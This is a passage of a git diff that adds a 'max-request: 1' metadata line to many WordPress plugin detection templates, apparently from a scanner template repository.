   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
+    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
+    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
+    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
+    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
+    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
+    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
+    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
+    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
+    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
+    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
+    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
+    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
+    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
+    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
+    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
